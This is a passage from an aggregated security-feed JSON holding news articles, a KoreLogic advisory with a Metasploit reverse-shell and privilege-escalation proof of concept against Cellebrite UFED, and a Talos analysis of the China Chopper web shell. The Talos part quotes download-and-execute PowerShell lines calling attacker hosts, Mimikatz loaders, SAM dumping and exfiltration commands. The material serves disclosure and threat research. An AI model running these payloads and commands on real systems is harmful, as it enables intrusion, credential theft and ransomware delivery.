rights](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) as the current user. The flaw was later [fixed ](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0674>)as part of the February 2020 Patch Tuesday release. Since then, further analysis of the flaw has been [published](<https://labs.f-secure.com/blog/internet-exploiter-understanding-vulnerabilities-in-internet-explorer>) and proof-of-concept (PoC) code has been [released](<https://github.com/maxpl0it/CVE-2020-0674-Exploit>), said researchers.\n\nCVE-2019-1458 meanwhile is a high-severity [elevation-of-privilege vulnerability](<https://threatpost.com/microsoft-actively-exploited-zero-day-bug/150992/>) in Win32k, which has a zero-day exploit circulating in the wild (used in attacks including [Operation WizardOpium)](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>). The exploit allows attackers to gain higher privileges on the attacked machine and avoid protection mechanisms in the Google Chrome browser, researchers said. The flaw, which has a CVSS score of 7.8 out of 10, was [fixed ](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458>)by Microsoft as part of its December Patch Tuesday release.\n\n## **Purple Fox**\n\nResearchers discovered a malvertising campaign in late June that utilized the Purple Fox EK, successfully exploiting Internet Explorer 11 via CVE-2020-0674 on Windows 10. The exploit used for CVE-2020-0674 targets Internet Explorer\u2019s usage of jscript.dll, a library required for Windows to operate. At the start of the exploit process, the malicious script attempts to leak an address from the RegExp implementation within jscript.dll.\n\nWith that leaked address, the malicious JavaScript code then searches for the PE header of jscript.dll, and then uses that header to locate an import descriptor for kernel32.dll. That contains the process and memory manipulation functions required for the EK to load the actual shellcode.\n\n\u201cIn particular, the function GetModuleHandleA is used to obtain the running module handle,\u201d said researchers. \u201cThis handle is used along with GetProcAddress to locate VirtualProtect, which is in turn used to enable \u2018read, write, execute\u2019 (RWX) permissions on the shellcode. Finally, the shellcode is triggered by calling an overwritten implementation of RegExp::test.\u201d\n\nThe shellcode then locates WinExec to create a new process, which begins the actual execution of the malware.\n\n## **EK Future**\n\nWhile exploit kits are [not as popular as they were](<https://threatpost.com/where-have-all-the-exploit-kits-gone/124241/>) a few years ago, researchers stress that they are [still part of the](<https://threatpost.com/threatlist-exploit-kits-still-a-top-web-based-threat/133044/>) threat landscape, with EKs like [Fallout and Rig continually retooling](<https://threatpost.com/fallout-ek-retools/141027/>).\n\n\u201cOne thing that hasn\u2019t changed regarding exploit kits is the way in which exploit-kit authors regularly update to include new attacks against newly discovered vulnerabilities,\u201d researchers said.\n\nBy building their own EK for distribution, the authors of the Purple Fox malware have been able to save money by no longer paying for the Rig EK. This shows that the attackers behind the Purple Fox malware are taking a \u201cprofessional approach\u201d by looking to save money and keep their product current, researchers said.\n\n\u201cThe fact that the authors of the Purple Fox malware have stopped using the RIG EK and moved to build their own EK to distribute their malware reminds us that malware is a business,\u201d they said. \u201cIn essence, the authors behind the Purple Fox malware decided to bring development \u2018in-house\u2019 to reduce costs, just like many legitimate businesses do. Bringing the distribution mechanism \u2018in-house\u2019 also enables greater control over what the EK actually loads.\u201d\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "modified": "2020-07-06T15:21:30", "published": "2020-07-06T15:21:30", "id": "THREATPOST:F0CFD85C624CF71A4056F7DCC02BD683", "href": "https://threatpost.com/microsoft-exploits-purple-fox-ek/157157/", "type": "threatpost", "title": "Purple Fox EK Adds Microsoft Exploits to Arsenal", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:18:17", "bulletinFamily": "info", "cvelist": ["CVE-2014-4113", "CVE-2015-1701"], "description": "[](<https://3.bp.blogspot.com/-pW4-SBx_J5I/V4YhiNwraPI/AAAAAAAABe8/wIiPg1gsMR8QuzUbm3IVLYyn-kpYJH4dgCLcB/s1600/scada-malware.png>)\n\nSecurity researchers have discovered a new campaign targeting energy companies in Western Europe with a sophisticated malware that almost goes to great lengths in order to remain undetected while targeting energy companies. \n \nResearchers from SentinelOne Labs discovered the malware, which has already infected at least one European energy company, is so sneaky and advanced that it is likely believed to be the work of a wealthy nation. \n \nThe malware, dubbed '[SFG](<https://sentinelone.com/blogs/sfg-furtims-parent/>)', contains about 280 kilobytes of code, featuring a vast arsenal of tools rarely seen in ordinary malware samples. It takes \"_extreme measures_\" to cleverly and stealthily evade a large number of security defenses before it drops its payload. \n \nThe malware dismantles antiviruses processes one-by-one until the malware is finally safe to uninstall them all. It also encrypts key features of its code so that it could not be discovered and analyzed. It'll not execute itself if it senses it's being run in a sandbox environment. \n \nThe Windows-based malware even takes special care of features such as facial recognition, fingerprint scanners, and other advanced biometric access control systems running inside target organizations. \n \nTo gain administrative access to the infected computer, the malware sample uses a pair of privilege escalation exploits for Windows flaws ([CVE-2014-4113](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4113>) and [CVE-2015-1701](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1701>)) that were patched by Microsoft in October 2014 and May 2015, respectively. \n\n\n> SentinelOne Chief Security Officer Udi Shamir says: \"_The malware has all the hallmarks of a nation-state attack due to its extremely high level of sophistication and the cost associated with creating software of this advanced nature._\"\n\nOnce it has gained administrative control of a computer, the malware surveys the connected network, reports information about the infected network back to its operators, and await further instructions, giving attackers a network backdoor on targeted industrial control systems. \n \nThe backdoor could then be used to install other malware on systems for more detailed espionage or _\"extract data or potentially shut down the energy grid,\"_ security researchers warn. \n \nThe SFG malware is related to an earlier malware sample dubbed **Furtim** \u2013 another piece of highly sophisticated malware that was [uncovered](<http://blog.ensilo.com/furtim-the-ultra-cautious-malware>) in May \u2013 that's also able to evade antivirus and other security defenses. \n \nThe amount of time, efforts, and resources required to create the malware means that it is the work of a team of hackers working for a wealthy nation government, though the researchers didn't reveal the nation behind the attack. \n\n\n> _\"It appears to be the work of multiple developers who've reverse engineered more than a dozen antivirus solutions and gone to extreme lengths to evade detection, including causing the [antivirus] software to stop working without the user being alerted,\" Shamir wrote says._ \n_ \n_ _\"Attacks of this nature require substantial funding and knowhow to pull off and are likely to be the result of a state-sponsored attack, rather than a cybercriminal group.\"_\n\nYou can find more technical details about the SFG malware in a [report](<https://sentinelone.com/blogs/sfg-furtims-parent/>) published by the security firm SentinelOne on Tuesday.\n", "modified": "2016-07-13T11:12:26", "published": "2016-07-13T00:12:00", "id": "THN:675EE08758C0AD2D11F9BC33AB15EA32", "href": "https://thehackernews.com/2016/07/scada-malware-energy.html", "type": "thn", "title": "State-Sponsored SCADA Malware targeting European Energy Companies", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "korelogic": [{"lastseen": "2020-06-11T21:22:38", "bulletinFamily": "software", "cvelist": ["CVE-2015-1701", "CVE-2020-12798"], "description": "Title: Cellebrite Restricted Desktop Escape and Escalation of User Privilege\nAdvisory ID: KL-001-2020-002\nPublication Date: 2020.05.14\nPublication URL: https://korelogic.com/Resources/Advisories/KL-001-2020-002.txt\n\n\n1. Vulnerability Details\n\n Affected Vendor: Cellebrite\n Affected Product: UFED\n Affected Version: 5.0 - 7.5.0.845\n Platform: Embedded Windows\n CWE Classification: CWE-269: Improper Privilege Management,\n CWE-20: Input Validation Error\n CVE ID: CVE-2020-12798\n\n\n2. Vulnerability Description\n\n Cellebrite UFED device implements local operating system\n policies that can be circumvented to obtain a command\n prompt. From there privilege escalation is possible using\n public exploits.\n\n\n3. Technical Description\n\n The Cellebrite UFED device implements local operating system\n policies which are designed to limit access to operating system\n functionality. These include but may not be limited to:\n\n 1. Preventing access to dialog such as Run, File Browser,\n and Explorer.\n\n and\n\n 2. Preventing access to process and application management tools\n such as Task Manager and the Control Panel.\n\n These policies can be circumvented by using functionality\n that is permitted by the policy governing the use of the user\n desktop. A user can leverage the Wireless Network connection\n string to select certificate based authentication, which then\n enables file dialogs that are able to be used to launch a\n command prompt. Following this, privileges can be elevated\n using off the shelf and publicly available exploits relevant\n to the specific Windows version in use.\n\n\n4. Mitigation and Remediation Recommendation\n\n The vendor has informed KoreLogic that this vulnerability is\n not present on devices manufactured \"at least since 2018.\" The\n vendor was uncertain of the exact version number that remediated\n this attack vector.\n\n\n5. Credit\n\n This vulnerability was discovered by Matt Bergin (@thatguylevel)\n of KoreLogic, Inc.\n\n\n6. Disclosure Timeline\n\n 2020.03.05 - KoreLogic submits vulnerability details to\n Cellebrite.\n 2020.03.17 - Cellebrite acknowledges receipt and the intention\n to investigate.\n 2020.04.16 - KoreLogic requests an update on the status of the\n vulnerability report.\n 2020.04.19 - Cellebrite responds, notifying KoreLogic that the\n vulnerable dialog is not available on newer UFED\n releases. Indicates they will determine when the\n remediation was introduced.\n 2020.05.04 - KoreLogic requests an update from Cellebrite.\n 2020.05.05 - Cellebrite responds that they do not have the\n version number at hand, but does not request\n delaying public disclosure.\n 2020.05.11 - MITRE issues CVE-2020-12798.\n 2020.05.12 - 45 business-days have elapsed since the report was\n submitted to Cellebrite.\n 2020.05.14 - KoreLogic public disclosure.\n\n\n7. Proof of Concept\n\n Begin by using the msfvenom binary to create a meterpreter\n payload that will initiate a remote connection to a C2. Copy\n the payload to a USB drive. Following this, use the msfconsole\n binary to create a C2 connection handler with the multi/handler\n functionality.\n\n $ msfvenom -p windows/meterpreter/reverse_tcp -f exe -o payload.exe LHOST=[REDACTED] LPORT=8888\n [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n [-] No arch selected, selecting arch: x86 from the payload\n No encoder or badchars specified, outputting raw payload\n Payload size: 341 bytes\n Final size of exe file: 73802 bytes\n Saved as: payload.exe\n $ sudo mount -o rw /dev/sda1 a/\n $ sudo cp payload.exe a/\n $ sync\n $ sudo umount a/\n $ msfconsole\n [snip]\n msf5 exploit(multi/handler) > show options\n\n Module options (exploit/multi/handler):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n\n\n Payload options (windows/meterpreter/reverse_tcp):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)\n LHOST [REDACTED] yes The listen address (an interface may be specified)\n LPORT 8888 yes The listen port\n\n\n Exploit target:\n\n Id Name\n -- ----\n 0 Wildcard Target\n\n\n msf5 exploit(multi/handler) > exploit -j -z\n [*] Exploit running as background job 1.\n [*] Exploit completed, but no session was created.\n [*] Started reverse TCP handler on [REDACTED]:8888\n\n Now insert the USB drive where payload.exe resides into a\n target Cellebrite device. Next, follow the steps below:\n\n 1. Open the Wireless Network Connection screen by clicking\n on the WiFi icon in the bottom right hand corner of the\n screen. This should be next to the system clock.\n\n 2. Select \"Change advanced settings\" -- this will bring up a\n screen called Windows Network Connection Properties. Choose\n the Wireless Networks tab.\n\n 3. Under the Preferred networks section, click the Add button\n and then select the Authentication tab. Make sure \"Enable IEEE\n 802.1x authentication for this network\" is enabled.\n\n 4. Under EAP Type, select \"Smart Card or other Certificate\"\n and then click the Properties button.\n\n 5. Under Trusted Root Certificate Authorities click the\n View Certificate button. This will bring up a screen called\n Certificate, choose the Details tab and click the \"Copy to\n File\" button. This will bring up a screen called Certificate\n Export Wizard.\n\n 6. Click Next and select any of the available export format\n options. For example, choose the \"DER encoded binary X.509\"\n option and click next.\n\n 7. Instead of typing out a export path click the Browse\n button to open a file dialog. In the \"File Name\" box type:\n \\WINDOWS\\System32\\ and under \"Save as type\" select the \"All\n Files (*.*)\" option. Hit the enter key.\n\n 8. Locate the cmd.exe file then drag and drop any DLL over\n it. For example, choose the clusapi.dll file located near the\n cmd.exe executable. This will open a Command Prompt screen as\n an unprivileged user.\n\n 9. Type the drive letter to change into the USB drive containing\n the payload.exe file.\n\n C:\\windows\\system32>D:\n D:\\>payload.exe\n\n This results in a connection back into Metasploit.\n\n [*] Sending stage (180291 bytes) to [REDACTED]\n [*] Meterpreter session 2 opened ([REDACTED]:8888 -> [REDACTED]:1041) at 2020-01-29 11:41:05 -0800\n msf5 exploit(multi/handler) > sessions -i 2\n [*] Starting interaction with 2...\n meterpreter > getuid\n Server username: TOUCH-[REDACTED]\\Operator\n\n An exploit for CVE-2015-1701 is loaded up and configured to run\n a local privilege escalation exploit against the unprivileged\n session and SYSTEM is obtained.\n\n msf5 exploit(windows/local/ms15_051_client_copy_image) > show options\n\n Module options (exploit/windows/local/ms15_051_client_copy_image):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n SESSION yes The session to run this module on.\n\n\n Exploit target:\n\n Id Name\n -- ----\n 0 Windows x86\n\n msf5 exploit(windows/local/ms15_051_client_copy_image) > set SESSION 2\n SESSION => 2\n msf5 exploit(windows/local/ms15_051_client_copy_image) > set PAYLOAD windows/meterpreter/reverse_tcp\n PAYLOAD => windows/meterpreter/reverse_tcp\n msf5 exploit(windows/local/ms15_051_client_copy_image) > set LPORT 8888\n LPORT => 8888\n msf5 exploit(windows/local/ms15_051_client_copy_image) > set LHOST [REDACTED]\n LHOST => [REDACTED]\n msf5 exploit(windows/local/ms15_051_client_copy_image) > run\n\n [*] Started reverse TCP handler on [REDACTED]:8888\n [*] Launching notepad to host the exploit...\n [+] Process 3936 launched.\n [*] Reflectively injecting the exploit DLL into 3936...\n [*] Injecting exploit into 3936...\n [*] Exploit injected. Injecting payload into 3936...\n [*] Payload injected. Executing exploit...\n [*] Sending stage (180291 bytes) to [REDACTED]\n [+] Exploit finished, wait for (hopefully privileged) payload execution to complete.\n [*] Meterpreter session 3 opened ([REDACTED]:8888 -> [REDACTED]:1045) at 2020-01-29 11:48:15 -0800\n\n meterpreter > getuid\n Server username: NT AUTHORITY\\SYSTEM\n meterpreter >", "edition": 1, "modified": "2020-05-14T00:00:00", "published": "2020-05-14T00:00:00", "id": "KL-001-2020-002", "href": "https://korelogic.com/Resources/Advisories/KL-001-2020-002.txt", "title": "Cellebrite Restricted Desktop Escape and Escalation of User Privilege", "type": "korelogic", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:00", "bulletinFamily": "software", "cvelist": ["CVE-2015-1684", "CVE-2015-1676", "CVE-2015-1715", "CVE-2015-1692", "CVE-2015-1706", "CVE-2015-1695", "CVE-2015-1696", "CVE-2015-1709", "CVE-2015-1698", "CVE-2015-1705", "CVE-2015-1688", "CVE-2015-1689", "CVE-2015-1691", "CVE-2015-1675", "CVE-2015-1677", "CVE-2015-1671", "CVE-2015-1708", "CVE-2015-1697", "CVE-2015-1710", "CVE-2015-1686", "CVE-2015-1679", "CVE-2015-1681", "CVE-2015-1678", "CVE-2015-1673", "CVE-2015-1718", "CVE-2015-1704", "CVE-2015-1685", "CVE-2015-1703", "CVE-2015-1658", "CVE-2015-1714", "CVE-2015-1717", "CVE-2015-1701", "CVE-2015-1694", "CVE-2015-1713", "CVE-2015-1716", "CVE-2015-1674", "CVE-2015-1670", "CVE-2015-1680", "CVE-2015-1702", "CVE-2015-1711", "CVE-2015-1712", "CVE-2015-1672", "CVE-2015-1699"], "description": "Buffer overflow, memory corruption, code execution, privilege escalation, restrictions bupass, DoS, information disclosure.", "edition": 1, "modified": "2015-05-13T00:00:00", "published": "2015-05-13T00:00:00", "id": "SECURITYVULNS:VULN:14492", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14492", "title": "Microsoft Windows multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "talosblog": [{"lastseen": "2019-08-27T16:21:09", "bulletinFamily": "blog", "cvelist": ["CVE-2015-0062", "CVE-2015-1701", "CVE-2016-0099", "CVE-2018-8440"], "description": "_By [Paul Rascagneres](<https://www.twitter.com/r00tbsd>) and [Vanja Svajcer](<https://twitter.com/vanjasvajcer>)._ \n \n\n\n[](<https://1.bp.blogspot.com/-jBq3FQDBVOA/XVF6aa_P4RI/AAAAAAAAATA/Ct_1ZK5SbSgWnN5H9DtyHPTOZDZtrGZRwCLcBGAs/s1600/image3.jpg>)\n\n### Introduction\n\nThreats will commonly fade away over time as they're discovered, reported on, and detected. But China Chopper has found a way to stay relevant, active and effective nine years after its initial discovery. [China Chopper](<https://attack.mitre.org/software/S0020/>) is a web shell that allows attackers to retain access to an infected system using a client side application which contains all the logic required to control the target. Several threat groups have used China Chopper, and over the past two years, we've seen several different campaigns utilizing this web shell and we chose to document three most active campaigns in this blog post. \n \nWe decided to take a closer look at China Chopper after security firm Cybereason reported on a massive attack against telecommunications providers called [\"Operation Soft Cell,\"](<https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers>) which reportedly utilized China Chopper. Cisco Talos discovered significant China Chopper activity over a two-year period beginning in June 2017, which shows that even nine years after its creation, attackers are using China Chopper without significant modifications. \n \nThis web shell is widely available, so almost any threat actor can use. This also means it's nearly impossible to attribute attacks to a particular group using only presence of China Chopper as an indicator. \n \nThe usage of China Chopper in recent campaigns proves that a lot of old threats never really die, and defenders on the internet need to be looking out for malware both young and old. \n \n \n\n\n### What is China Chopper?\n\nChina Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool. The web shell works on different platforms, but in this case, we focused only on compromised Windows hosts. China Chopper is a tool that has been used by some state-sponsored actors such as [Leviathan](<https://attack.mitre.org/groups/G0065/>) and [Threat Group-3390](<https://attack.mitre.org/groups/G0027/>), but during our investigation we've seen actors with varying skill levels. \n \nIn our research, we discovered both Internet Information Services (IIS) and Apache web servers compromised with China Chopper web shells. We do not have additional data about how the web shell was installed, but there are several web application frameworks such as older versions of Oracle WebLogic or WordPress that may have been targeted with known remote code execution or file inclusion exploits. \n \nChina Chopper provides the actor with a simple GUI that allows them to configure servers to connect to and generate server-side code that must be added to the targeted website code in order to communicate. \n \n\n\n[](<https://1.bp.blogspot.com/-Dv9InEUHyds/XVF6hgNog_I/AAAAAAAAATE/DkXog3y-iSgj7xMraPu4RAL6xNYnXg0DwCLcBGAs/s1600/image9.png>)\n\n_China Chopper GUI_\n\n \nThe server-side code is extremely simple and contains, depending on the application platform, just a single line of code. The backdoor supports .NET Active Server Pages or PHP. \n \nHere is an example of a server-side code for a compromised PHP application: \n \n\n \n \n <?php @eval($_POST['test']);?>\n\n \nWe cannot be sure if the simplicity of the server code was a deliberate decision on the part of the China Chopper developers to make detection more difficult, but using pattern matching on such as short snippet may produce some false positive detections. \n \nThe China Chopper client communicates with affected servers using HTTP POST requests. The only function of the server-side code is to evaluate the request parameter specified during the configuration of the server code in the client GUI. In our example, the expected parameter name is \"test.\" The communication over HTTP can be easily spotted in the network packet captures. \n \nChina Chopper contains a remote shell (Virtual Terminal) function that has a first suggested command of 'netstat an|find \"ESTABLISHED.\"' and it is very likely that this command will be seen in process creation logs on affected systems. \n \n\n\n[](<https://1.bp.blogspot.com/-JIbBgJHZZEI/XVF6rJ5F1TI/AAAAAAAAATM/G8POGJS2rcsVQhyjqhmPf52Qx7q3wWzDgCLcBGAs/s1600/image4.png>)\n\n_China Chopper's first suggested Terminal command_\n\n \nWhen we analyze the packet capture, we can see that the parameter \"test\" contains another eval statement. \n \nDepending on the command, the client will submit a certain number of parameters, z0 to zn. All parameters are encoded with a standard base64 encoder before submission. Parameter z0 always contains the code to parse other parameters, launch requested commands and return the results to the client. \n \n\n \n \n test=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=Y2QgL2QgIkM6XHhhbXBwXGh0ZG9jc1xkYXNoYm9hcmRcIiZuZXRzdGF0IC1hbiB8IGZpbmQgIkVTVEFCTElTSEVEIiZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D\n\n \nEncoded China Chopper POST request with parameters \n \nIn this request, the decoded parameters are: \n\n \n \n z0 - @ini_set(\"display_errors\",\"0\");@set_time_limit(0);@set_magic_quotes_runtime(0);echo(\"->|\");;$p=base64_decode($_POST[\"z1\"]);$s=base64_decode($_POST[\"z2\"]);$d=dirname($_SERVER[\"SCRIPT_FILENAME\"]);$c=substr($d,0,1)==\"/\"?\"-c \\\"{$s}\\\"\":\"/c \\\"{$s}\\\"\";$r=\"{$p} {$c}\";@system($r.\" 2>&1\",$ret);print ($ret!=0)?\" \n ret={$ret} \n \":\"\";;echo(\"|<-\");die(); \n \n z1 - cmd \n \n z2 - cd /d \"C:\\xampp\\htdocs\\dashboard\\\"&netstat -an | find \"ESTABLISHED\"&echo [S]&cd&echo [E]\n\n \nThe end of the command \"&echo [S]&cd&echo [E]\" seems to be present in all virtual terminal requests and may be used as a reliable indicator to detect China Chopper activity in packet captures or behavioral logs. \n \nApart from the terminal, China Chopper includes a file manager (with the ability to create directories, download files and change file metadata), a database manager and a rudimentary vulnerability scanner. \n \nWhat follows is our view into three different compromises, each with different goals, tools, techniques and likely different actors. \n \n\n\n[](<https://1.bp.blogspot.com/-_fwmst4cxsc/XVF60IYW4iI/AAAAAAAAATU/NkngLjkJvIk-VOhc8eaB2PyyJZYtFjGFQCLcBGAs/s1600/image7.jpg>)\n\n_Timeline of the observed case studies_\n\n \n\n\n### Case study No. 1: Espionage context\n\nWe identified the usage of China Chopper in a couple of espionage campaigns. Here, we investigate a campaign targeting an Asian government organization. In this campaign, China Chopper was used in the internal network, installed on a few web servers used to store potentially confidential documents. \n \nThe purpose of the attacker was to obtain documents and database copies. The documents were automatically compressed using WinRAR: \n \n\n \n \n cd /d C:\\Windows\\Working_Directory\\ \n renamed_winrar a -m3 -hp19_Characters_Complex_Password -ta[date] -n*.odt -n*.doc -n*.docx -n*.pdf -n*.xls -n*.xlsx -n*.ppt -n*.pptx -r c:\\output_directory\\files.rar c:\\directory_to_scan\\\n\n \nThis command is used to create an archive containing documents modified after the date put as an argument. The archives are protected with a strong password containing uppercase, lowercase and special characters. The passwords were longer than 15 characters. \n \nWe assume the attacker ran this command periodically in order to get only new documents and minimize the quantity of exfiltrated data. \n \nOn the same target, we identified additional commands executed with China Chopper using WinRAR: \n \n\n \n \n rar a -inul -ed -r -m3 -taDate -hp<profanity> ~ID.tmp c:\\directory_to_scan\n\n \nChina Chopper is a public hacking tool and we cannot tell if in this case the attacker is the same actor as before. But the rar command line here is sufficiently different to note that it could be a different actor. The actor used an offensive phrase for a password, which is why we've censored it here. \n \nThe attacker deployed additional tools to execute commands on the system: \n \n\n \n \n C:\\windows\\Microsoft.NET\\Framework\\v2.0.50727\\MSBuild.exe C:\\windows\\temp\\Document.csproj /p:AssemblyName=C:\\windows\\temp\\downloader.png /p:ScriptFile=C:\\windows\\temp\\downloader.dat /p:Key=27_characters_key > random.tmp\n\n \nMSBuild.exe is used to compile and execute a .NET application with two arguments: the ScriptFile argument contains a PowerShell script encrypted with the value of the key argument. Here is the .NET code: \n \n\n\n[](<https://1.bp.blogspot.com/-fyO_pE90tKU/XVF69g6-T_I/AAAAAAAAATc/oNWFm6VZqzsbSD0gCuU9kSQG3hgkxo89QCLcBGAs/s1600/image2.png>)\n\n_.NET loader code_\n\n \nThe .NET loader supports encrypted files or URLs as the script argument. If the operator uses an HTTP request, the loader downloads the payload with one of the hardcoded User-Agents. The loader decrypts the downloaded file and executes it: \n \n\n\n[](<https://1.bp.blogspot.com/-vmu9ILGV2K8/XVF7Hn-FSlI/AAAAAAAAATg/zTv_Bi3jlOU0LwMI17ylxLF_QQOSah_iwCLcBGAs/s1600/image5.png>)\n\n_Hardcoded User-Agent strings_\n\n \nIn our case, the purpose of the decrypted payload was to perform a database dump: \n \n\n \n \n powershell.exe -exe bypass -nop -w hidden -c Import-Module C:\\windows\\help\\help\\helper.ps1; \n Run-MySQLQuery -ConnectionString 'Server=localhost;Uid=root;Pwd=;database=DBName; \n Convert Zero Datetime=True' -Query 'Select * from table where UID > 'Value' -Dump\n\n \nThe \"where UID\" condition in the SQL query has the same purpose as the date in the previous WinRAR command. We assume the attacker performs the query periodically and does not want to dump the entire database, but only the new entries. It is interesting to see that after dumping the data, the attacker checks if the generated file is available and if it contains any data: \n \n\n \n \n dir /O:D c:\\working_directory\\db.csv \n powershell -nop -exec bypass Get-Content \"c:\\working_directory\\db.csv\" | Select-Object -First 10\n\n \nHow are the file archives and the database dumps exfiltrated? Since the targeted server is in an internal network, the attacker simply maps a local drive and copies the file to it. \n \n\n \n \n cd /d C:\\working_directory\\ \n net use \\192.168.0.10\\ipc$ /user:USER PASSWORD \n move c:\\working_directory\\db.csv \\192.168.0.10\\destination_directory\n\n \nThe attacker must have access to the remote system in order to exfiltrate data. We already saw the usage of a HTTP tunnel tool to create a network tunnel between the infected system and a C2 server. \n \n\n\n### Case No. 2: Multi-purpose campaign\n\nWe observed another campaign targeting an organisation located in Lebanon. While our first case describes a targeted campaign with the goal to exfiltrate data affecting internal servers, this one is the opposite: an auxiliary public web site compromised by several attackers for different purposes. \n \nWe identified actors trying to deploy ransomware on the vulnerable server using China Chopper. The first attempt was Sodinokibi ransomware: \n \n\n \n \n certutil.exe -urlcache -split -f hxxp://188.166.74[.]218/radm.exe C:\\Users\\UserA\\AppData\\Local\\Temp\\radm.exe\n\n \nThe second delivered the [Gandcrab ransomware](<https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html>): \n \n\n \n \n If($ENV:PROCESSOR_ARCHITECTURE -contains 'AMD64'){ \n Start-Process -FilePath \"$Env:WINDIR\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe\" -argument \"IEX ((new-object net.webclient).downloadstring('https://pastebin.com/raw/Hd7BmJ33')); \n Invoke-ACAXGZFTTDUDKY; \n Start-Sleep -s 1000000;\" \n } else { \n IEX ((new-object net.webclient).downloadstring('https://pastebin.com/raw/Hd7BmJ33')); \n Invoke-ACAXGZFTTDUDKY; \n Start-Sleep -s 1000000; \n }\n\n \nHere is the script hosted on Pastebin: \n \n\n\n[](<https://1.bp.blogspot.com/-Y3yXMFaOJ7w/XVF7ZZ8jIaI/AAAAAAAAATs/x5YmFtUD_1AjX2R5uGHlRGvsXiXEkAz5ACLcBGAs/s1600/image8.png>)\n\n_Reflective loader downloaded from pastebin.com_\n\n \nThe script executes a hardcoded PE file located \u2014 Gandcrab \u2014at the end of the script using a reflective DLL-loading technique. \n \nIn addition to the ransomware, we identified another actor trying to execute a Monero miner on the vulnerable server with China Chopper: \n \n\n \n \n Powershell -Command -windowstyle hidden -nop -enc -iex(New-Object Net.WebClient).DownloadString('hxxp://78.155.201[.]168:8667/6HqJB0SPQqbFbHJD/init.ps1')\n\n \nHere's a look at the miner configuration: \n \n\n\n[](<https://1.bp.blogspot.com/-HA_kY6CQEW0/XVF7tCD8FkI/AAAAAAAAAT0/oHnijHOyXFs3MVzen70IygrDQay3g_5VgCLcBGAs/s1600/image1.png>)\n\n_Monero miner configuration_\n\n \nSome of the detected activity may have been manual and performed in order to get OS credentials. \n \nTrying to get the registry: \n \n\n \n \n reg save hklm\\sam sam.hive \n reg save hklm\\system system.hive \n reg save hklm\\security security.hive\n\n \nUsing Mimikatz (with a few hiccups along the way): \n \n\n \n \n powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); \n Invoke-Mimikatz >>c:\\1.txt\n\n \n\n \n \n powershell IEX\",\"(New-Object\",\"Net.WebClient).DownloadString('hxxp://is[.]gd/oeoFuI'); Invoke-Mimikatz -DumpCreds\n\n \n\n \n \n C:\\Windows\\System32WindowsPowerShell\\v1.0\\powershell.exe IEX \n \n (New-Object\",\"Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); \n Invoke-Mimikatz\n\n \n\n \n \n C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe [Environment]::Is64BitProcess\n\n \n\n \n \n powershell.exe IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); \n Invoke-Mimikatz >>c:\\1.txt\n\n \nAttempting to dump password hashes using a PowerShell module and the command line: \n \n\n \n \n IEX (New-Object \n \n Net.WebClient).DownloadString('https://raw.githubusercontent.com/klionsec/CommonTools/master/Get-PassHashes.ps1');Get-PassHashes;\n\n \nThe attackers also tried procdump64.exe on lsass.exe to get the local credentials stored in memory. In addition to the multiple attempts to dump the credential, the attackers had to deal with 